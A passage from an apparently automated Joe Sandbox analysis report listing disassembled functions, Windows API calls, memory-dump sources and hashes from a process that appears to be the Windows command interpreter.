                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0019CACE
                                                                                                                                                                                                                          • memcmp.MSVCRT(001CA7F0,001934F8,00000003), ref: 001AD16E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Pointer_get_osfhandle$LockShared$AcquireByteCharMultiReadReleaseTypeWidememcmpwcschr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1383533039-0
                                                                                                                                                                                                                          • Opcode ID: 7463fa9ad08076112e39e25782a1b9bfce4aae18e2e2ad17865a6536558b05c2
                                                                                                                                                                                                                          • Instruction ID: 19910ab8c7e76040845ede4f99f4248dc214a02085e32bef0352dc391791aacb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7463fa9ad08076112e39e25782a1b9bfce4aae18e2e2ad17865a6536558b05c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C4106719023188BEF34CF28DC89BA97776AF45710F9800AAF40A97590DBB58DD1CF96
                                                                                                                                                                                                                          Function 001A0444 Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 97COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                          • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                                                                                                                          • API String ID: 2081463915-1668778490
                                                                                                                                                                                                                          • Opcode ID: abe228e937dbea54d8421ee0d6f08ddddbcc73268e2ca557310f1dad99ee0c33
                                                                                                                                                                                                                          • Instruction ID: 6da90ea97ccf639777101cf80d4e4144c4efa972e119f2911cf409cbb3fd2046
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abe228e937dbea54d8421ee0d6f08ddddbcc73268e2ca557310f1dad99ee0c33
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E21B775609306AAEB2D5B65AC1673A27D8EF8A764F64441FF042825C1EFF4C8408A66
                                                                                                                                                                                                                          Function 00199EF2 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 278COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00199F3A
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019A02D
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 0019A03F
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,00000001,?,00000001), ref: 0019A0E8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _get_osfhandlememset
                                                                                                                                                                                                                          • String ID: DPATH
                                                                                                                                                                                                                          • API String ID: 3784859044-2010427443
                                                                                                                                                                                                                          • Opcode ID: 9b3d3780b9de1772143c902e9feb037098d2227d5a3d751c1873277da1c8d4af
                                                                                                                                                                                                                          • Instruction ID: df41eaf90510791cf46119aceea9dd42e5ea0ac25b3ee7cf56a19c8716d1c0bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b3d3780b9de1772143c902e9feb037098d2227d5a3d751c1873277da1c8d4af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69A1F135A00201ABCF24AF78CC8597AB7F5EF99720B28862DF45697290DB30DC45CBD1
                                                                                                                                                                                                                          Function 001B4953 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 260timeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B4A7B
                                                                                                                                                                                                                          • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,?), ref: 001B4B98
                                                                                                                                                                                                                          • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?), ref: 001B4BC5
                                                                                                                                                                                                                          • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 001B4BD2
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B4BDC
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001B4C30
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LocalTime$ErrorLast$_get_osfhandle
                                                                                                                                                                                                                          • String ID: %s$/-.
                                                                                                                                                                                                                          • API String ID: 1033501010-531045382
                                                                                                                                                                                                                          • Opcode ID: 8cc86b159add651ec3a348cd25e6ae046d7e1b680565b677a1508fc63c990cb4
                                                                                                                                                                                                                          • Instruction ID: f48bd52e8d3a499d8eec5da0656ca531218398b7684d30f6ddfa138c7813cde6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8cc86b159add651ec3a348cd25e6ae046d7e1b680565b677a1508fc63c990cb4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56815432A4021597DF28EB78CD46BFA73A4EF94B00F20816AE906D7192EF71DE45C614
                                                                                                                                                                                                                          Function 00197150 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsnicmpswscanf
                                                                                                                                                                                                                          • String ID: :EOF
                                                                                                                                                                                                                          • API String ID: 1534968528-551370653
                                                                                                                                                                                                                          • Opcode ID: 2cfce2a9877d28769ef2f1b18eaf361c6eea78d514d3fbdc7e8320f1491e8e83
                                                                                                                                                                                                                          • Instruction ID: 3758c9198e5b97aaeebe0c067763091d8aaa538ee3f5c63d525cb1974e5c3ad5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cfce2a9877d28769ef2f1b18eaf361c6eea78d514d3fbdc7e8320f1491e8e83
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5315735A16360ABCF20AF649C49F7A77A8FF52710F54042AF982976D1DB34DC81C7A1
                                                                                                                                                                                                                          Function 001B6035 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 113libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 001B6069
                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 001B607E
                                                                                                                                                                                                                          • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000480,?), ref: 001B60DC
                                                                                                                                                                                                                          • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 001B6128
                                                                                                                                                                                                                          • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 001B614F
                                                                                                                                                                                                                          • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 001B6186
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                                                                                                                                          • API String ID: 1580871199-2613899276
                                                                                                                                                                                                                          • Opcode ID: dbf62a6f1f0d3fcabc1b41df82ced4a6bd8e81aa135a42b003493f971a448795
                                                                                                                                                                                                                          • Instruction ID: 16f0d47b65a9e55954e86decf81f931aabc39c8588a3a3112aec45f8043a2e79
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbf62a6f1f0d3fcabc1b41df82ced4a6bd8e81aa135a42b003493f971a448795
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E4171B1A01219ABDB20DB25DC85ABB777CEF41744F0040A9FA05E3281DB349E85CB65
                                                                                                                                                                                                                          Function 001A654B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001A65A4
                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 001A65D7
                                                                                                                                                                                                                          • _open_osfhandle.MSVCRT ref: 001A65EB
                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 001B2092
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                                                                                                                                          • String ID: con
                                                                                                                                                                                                                          • API String ID: 689241570-4257191772
                                                                                                                                                                                                                          • Opcode ID: 1da9f17fda611bde7e9194d3d26bac6e243d42adcfff99b8cabef3d79e36128e
                                                                                                                                                                                                                          • Instruction ID: 4d38af1aabe8551378292536ffc1c91157196f70030d0162bd54d6e58e05d328
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1da9f17fda611bde7e9194d3d26bac6e243d42adcfff99b8cabef3d79e36128e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE314C76E01204AFD7289BA89C49BAF7BB9EB42774F35422AF412E31C0DB749D41C751
                                                                                                                                                                                                                          Function 001B61A2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98memoryfileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 001B61D7
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 001B6211
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 001B6254
                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 001B625B
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 001B628D
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 001B6294
                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 001B629B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                                                                                                                                                                                                          • String ID: PE
                                                                                                                                                                                                                          • API String ID: 3093239467-4258593460
                                                                                                                                                                                                                          • Opcode ID: b0c262c8b3e3b5803c0b612852b64431cb8f37d112b5492cb32278f9c2f958cb
                                                                                                                                                                                                                          • Instruction ID: eae50379ff5616549c1080cc9c5281fb0a057e48f91675a2db69b5621f177cbc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0c262c8b3e3b5803c0b612852b64431cb8f37d112b5492cb32278f9c2f958cb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93310E34701304AAFB20ABA28C09FEE7769AFE8B51F044265F911D61D0DB788846C661
                                                                                                                                                                                                                          Function 00198F21 Relevance: 13.9, APIs: 9, Instructions: 389COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00198FCD
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00198FE3
                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00199002
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00199013
                                                                                                                                                                                                                            • Part of subcall function 0019A62F: wcschr.MSVCRT ref: 0019A635
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp$AttributesErrorFileLastwcschr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2943530692-0
                                                                                                                                                                                                                          • Opcode ID: 553f6e348a107214a1a14a3b4ce1d13d784c30d2ae38a67579d0e44e5b3db711
                                                                                                                                                                                                                          • Instruction ID: 0dfa7a03400c8d01ff9f05df45172e0f530321e0d723be611ef76c25bbf56929
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 553f6e348a107214a1a14a3b4ce1d13d784c30d2ae38a67579d0e44e5b3db711
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06C13435A042119BCF28EF7C888567E77B5BF59314F28812EE916D7281EB74CD81CB91
                                                                                                                                                                                                                          Function 0019802C Relevance: 13.7, APIs: 9, Instructions: 175COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00198060
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,00000000,?,00000000), ref: 001981BE
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,-00000001,00000000,?,00000000), ref: 0019818C
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00198197
                                                                                                                                                                                                                          • longjmp.MSVCRT(001D0A30,00000001,-00000001,00000000,?,00000000), ref: 001AB09E
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,001B7FC9,?,001B99AE,00000000,?,00000000,001ACF94,00000000,?), ref: 001AB0AB
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,001B7FC9,?,001B99AE,00000000,?,00000000,001ACF94,00000000,?), ref: 001AB0C1
                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 001AB0D5
                                                                                                                                                                                                                          • fflush.MSVCRT ref: 001AB0E3
                                                                                                                                                                                                                            • Part of subcall function 00198F21: _wcsicmp.MSVCRT ref: 00198FCD
                                                                                                                                                                                                                            • Part of subcall function 00198F21: _wcsicmp.MSVCRT ref: 00198FE3
                                                                                                                                                                                                                            • Part of subcall function 00198F21: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00199002
                                                                                                                                                                                                                            • Part of subcall function 00198F21: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00199013
                                                                                                                                                                                                                            • Part of subcall function 00198E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001D8BF0,00000000,?), ref: 00198EC3
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D3A
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D44
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D57
                                                                                                                                                                                                                            • Part of subcall function 001A1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D61
                                                                                                                                                                                                                            • Part of subcall function 001A01F5: wcsrchr.MSVCRT ref: 001A01FB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$Mode$AttributesCriticalFileHeapLastSection_wcsicmpmemset$AllocCurrentDirectoryEnterFullLeaveNamePathProcessfflushfprintflongjmpwcsrchr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3753564779-0
                                                                                                                                                                                                                          • Opcode ID: e901226ef35ed84a627c53c5422db7f333a88e2bfacaacc293217921ea0f5f5c
                                                                                                                                                                                                                          • Instruction ID: 5650cb053a4124f6e3df39241e4757b6efaa84f806baf1efbc0c81ab8b3abfd4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e901226ef35ed84a627c53c5422db7f333a88e2bfacaacc293217921ea0f5f5c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F51DE30A01211AFCF24EBB49C96ABF77B5EF19710F14042AF906D7691EB70C981CB51
                                                                                                                                                                                                                          Function 001B8B6C Relevance: 13.6, APIs: 9, Instructions: 93fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B8B7B
                                                                                                                                                                                                                          • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001B9323,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 001B8B83
                                                                                                                                                                                                                            • Part of subcall function 0019A16C: _close.MSVCRT ref: 0019A19B
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B8BB5
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001B8BBD
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B8BCF
                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001B8BD7
                                                                                                                                                                                                                          • memcmp.MSVCRT(?,?,?), ref: 001B8BED
                                                                                                                                                                                                                            • Part of subcall function 001A654B: _wcsicmp.MSVCRT ref: 001A65A4
                                                                                                                                                                                                                            • Part of subcall function 001A654B: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 001A65D7
                                                                                                                                                                                                                            • Part of subcall function 001A654B: _open_osfhandle.MSVCRT ref: 001A65EB
                                                                                                                                                                                                                            • Part of subcall function 001A654B: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 001B2092
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B8C1A
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001B8C22
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$_get_osfhandle$Pointer$BuffersCloseCreateFlushHandleRead_close_open_osfhandle_wcsicmpmemcmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4208585293-0
